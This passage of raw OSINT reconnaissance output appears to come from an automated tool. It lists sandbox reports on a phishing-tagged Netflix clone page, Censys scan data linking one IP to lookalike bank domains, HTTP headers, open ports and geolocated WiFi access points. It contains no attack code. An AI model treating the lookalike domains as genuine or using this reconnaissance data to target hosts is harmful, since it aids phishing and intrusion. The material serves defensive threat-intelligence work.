".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--vertical .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 300x300 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab4009.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab4009.tmp]- [targetUID: 00000000-00003016]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 dat | 185.199.110.153 |
| 2023-05-12 02:44:14 | IP Address | No | DNS Resolver | 55 | 0 | 1 | 0 | None | 172.67.135.9 | ayhu.xyz |
| 2023-05-12 02:52:59 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nwapi2.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi2.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:57 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2a06:98c1:3120::1 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 221480 (Net ID: 00:02:2D:22:14:80) | 34.0544, -118.244 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha1-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.135.9 |
| 2023-05-12 03:03:42 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01101101.github.io |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 5 | 0 | 1 | 0 | None | http://ayhu.xyz/ | ayhu.xyz |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Montreal, Quebec, H4X, United States, North America |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:7C:01:7C) | 52.3759, 4.8975 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:443 | 87.248.157.102 |
| 2023-05-12 02:45:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://kuldeepsuthar007.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://kuldeepsuthar007.github.io/netflixclone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b18_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b18_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b18_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b18_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2840"\n "IsoScope_b18_ConnHashTable<2840>_HashTable_Mutex"\n "IsoScope_b18_IE_EarlyTabStart_0xb48_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b18_IE_EarlyTabStart_0xb48_Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.23.52:443"\n "142.251.46.234:443"\n "45.57.90.1:443"\n "162.55.233.23:443"\n "203.192.208.114:443"\n "142.251.32.35:443"\n "104.26.5.108:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kuldeepsuthar007.github.io"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "netflix.com from your personal computer or on any" (Indicator: "dir "; File: "netflixclone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced" and extension "png"\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100" and extension "gif"\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDz8V1g_1_.woff" has type "Web Open Font Format TrueType length 66448 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLFj_V1g_1_.woff" has type "Web Open Font Format TrueType length 66376 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLEj6V1g_1_.woff" has type "Web Open Font Format TrueType length 66232 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLGT9V1g_1_.woff" has type "Web Open Font Format TrueType length 65760 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7V1g_1_.woff" has type "Web Open Font Format TrueType length 65616 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLBT5V1g_1_.woff" has type "Web Open Font Format TrueType length 63856 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrLPTedA_1_.woff" has type "Web Open Font Format TrueType length 62300 version 1.1"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "netflix-logo-0_1_.png" has type "PNG image data 2208 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "download-icon_1_.gif" has type "GIF image data version 89a 100 x 100"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002840]\n "boxshot_1_.png" has type "PNG image data 150 x 210 8-bit colormap non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002840]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF219ECD0E1D500FC9.TMP" has type "data"- Location: [%TEMP%\\~DF219ECD0E1D500FC9.TMP]- [targetUID: 00000000-00002840]\n "~DF0C0FBE77418B3702.TMP" has type "data"- Location: [%TEMP%\\~DF0C0FBE77418B3702.TMP]- [targetUID: 00000000-00002840]\n "~DFB2A7803A8671EBE5.TMP" has type "data"- Location: [%TEMP%\\~DFB2A7803A8671EBE5.TMP]- [ | 185.199.111.153 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Germany | Frankfurt am Main, Hesse, HE, Germany, DE |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | unsplash (Category: images)
https://unsplash.com/@login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:89:70) | 37.7813933,-122.3918002 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | netcraft.com |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eBOS (Net ID: 00:14:6A:5B:53:93) | 32.8608, -79.9746 |
| 2023-05-12 02:57:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://injectitlimited.cmail19.com/t/i-c-tiirkhydn', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"injectitlimited.cmail19.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"injectitlimited.cmail19.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar572B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3348"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IE_EarlyTabStart_0xc80_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_ConnHashTable<3348>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d14_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d14_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d14_IE_EarlyTabStart_0xc80_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"184.72.15.88:80"\n "35.229.48.116:443"\n "23.61.169.89:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "J81AH7HB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J81AH7HB.txt]- [targetUID: 00000000-00003348]\n Dropped file: "DDH1BHOS.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DDH1BHOS.txt]- [targetUID: 00000000-00003348]\n Dropped file: "ZK24XWU9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZK24XWU9.txt]- [targetUID: 00000000-00003348]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 